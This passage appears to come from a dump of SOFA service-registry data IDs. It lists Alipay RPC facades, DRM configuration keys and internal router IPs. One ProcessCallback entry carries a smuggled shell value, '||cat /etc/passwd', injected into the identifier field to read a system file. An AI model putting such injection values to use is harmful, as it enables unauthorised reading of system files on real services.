E#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdExperimentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.promo.ActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.UfeFeatureCalService:1.0:antfeaturecloudrc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.luckyfish.repo.FinsWinInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:securityservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.verify.rpc.facade.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.StrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.199.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pkgcore.common.service.facade.PkgSyncOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jiuzhou.facade.WorkflowCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.keplerui_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricecenter.common.service.facade.api.price.PriceCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.PlanAppointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_RISKMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfingoods.common.service.facade.api.GoodsInstorageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdispatcher.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_openeval_three_level_task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.payplus.common.service.facade.api.AccountDetailItemSyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.188.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.insure.AutoTaobaoOrderDetailFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyserver.common.service.facade.spi.BizSheetFacade:1.0:todo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.144.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.workday.WorkDayQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.allocation.EntrustWithdrawDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.biz.facade.api.TeamOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.test.pub:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ASTTSHIPCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.bizfee.facade.FeeOrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.MultiVersionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.promo.PromoDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.facade.MessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.admin.autotest.drm.DrmFincapacityConfig.batchStartPlanIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybYieldTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireAuthCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.ipromotion.common.service.facade.api.campaign.CampaignConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finaicontentcore.api.forum.ForumQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointQuotaQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.common.service.facade.deploy.IcDeployActionTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTaskFlowQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloanspacex@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.keplerweb.keplerui_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiandataproc.common.service.api.DailyFileVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_zscriptDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.BillkeyProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.TemplateResourceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.BehaviorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.DwsOptService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instrtdecision.common.service.facade.api.BankCardAssertConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_MINIPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.riskdatacenter.service.facade.capplan.CapPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.query.FundUserTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.88.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkqafactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rulemng.common.service.facade.rule.ZoneManageService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mapi.facade.exterface.ExterfaceFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.hainaprod.common.service.facade.api.mini.op.OpInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.bizmng.facade.ResponseCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.rule.RuleEditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.54.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alipaymember.common.service.facade.family.service.FamilyPointCertSingleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SMSGW_CACHE_REFRESH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clive.common.service.facade.api.CliveChatService:1.0.0:clive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.ucdpSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxtrade.common.service.facade.gui.StrategyParamMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.app.service.facade.api.withdraw.WithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.232.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.switchPcld,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.quality.QualityInfoQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.item.api.CaterItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrp.service.facade.whitelist.MrpWhitelistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.whitelist.WhiteListOpenService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.keymap.facade.asset.api.RiskScanEventManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbomp.common.service.facade.manager.api.MerchantMemberMergeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:developertool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDepositProcessCallBack1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:||cat /etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_GUARDS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:directPromoteCreditCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0:pcloanlend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_EXCHANGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:miniselfop@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sitebuilder.biz.shared.ops.FastRecoveryOpsPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LINKE-ACI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-alideviceinfo-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csmobile.service.rpc.api.RobotCommonGwService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.246.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmobile.common.service.community.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_mztest001#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilesearch.biz.rpc.service.QPFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:finassistantcore_shitici@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductOfferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.129.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbomp.biz.shared.relations.OutIdRelationLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","erecon@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cicada.common.service.facade.api.service.ServiceBeanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-queryRulePMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:schedule-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.ZproxyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.activity.sign.UserSignQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-miniprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.trsbrain.common.service.facade.service.DefenseRuleRiskCureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecsa.service.provider.CsaServiceAdapter:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilesearchmng.service.MerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbreservationprod.common.service.facade.commonreservation.PriceServicePlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.181.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.progov.service.api.SqlParserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicCrossEnvDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianapi.client.SystemExterfaceInvokeService:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.store.service.facade.PaymentResultStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.walle.service.facade.api.ReplayTaskReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:instinfo.instal.trail.product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.findtprod.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charge.service.facade.ChargeRefundFacade:1.0@TCPM#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.238.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.l2cache.L2CacheServerSwitch.controlRightStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insclaimportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadata.conf.facade.NearMetadataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.security.facade.antbuservice.AntBuservicePermissionService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.facade.CouponQueryFacadeAtGzone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.ExchangeAccountConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.DeviceInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.icardcenter.service.facade.api.query.CardInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.bizspace.BusinessSpaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.principal.AirmngPrincipalService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepcustprod.facade.api.certify.EpCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.service.facade.zmgo.settle.SettleAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.activity.ApplyActivityModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.BizPlatformInquiryFacade:1.0:gfptBizPlatformInquiryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifxquote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.selectableFundProductIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.UctransMsgRetryDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:minicore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pricecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yqcore.common.service.facade.api.MessagePushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.charityprod.commom.service.facade.CharityUserCertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:otherBonusFeeDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.playback.appiterationdata.OeEmulatorPlaybackAppIterationDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.PromotionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ContactsInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.policy.PolicyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.batchActivitySmidFileCheckParalleNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.taobao.hsf.triple.helloworld.Greeter:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.opsware.rest.StackSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcloanmng.biz.service.ConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxTaskDataWriter:1.0:none@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:paylink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.ExternalSystemInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.mng.CollectionsMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.LigentServProdService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.dapply.UniteApplyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:wxSignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-9#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbpromobatch.common.service.facade.BatchTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.mavenConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.antfinancial.antchain.cloud.endpoint.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.devicemanage.common.service.facade.DataManageDeviceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.couponcoreTbButtonHidden,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.glVchrAutoCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.moee.common.service.facade.service.tasks.TaskExecutionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.specialGonganCheckInstStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.49.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.75.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_IINTEGRATION_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iotDevicePolicyConfig_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ivbprod.service.facade.api.UserCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.irisk.IntlVelocityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ArchDomainUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.kmi.common.service.facade.PgpKeyManagementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.newCardHolderDecision,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:inscheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iconfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebContractService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:edubizsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.gift.facade.TripGiftInsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:infostudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:igfeaturemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.MonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:guardianconsoleMAIN_SITE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.72.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finslip:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditdecision.service.PcreditLoanConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RatePublishTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","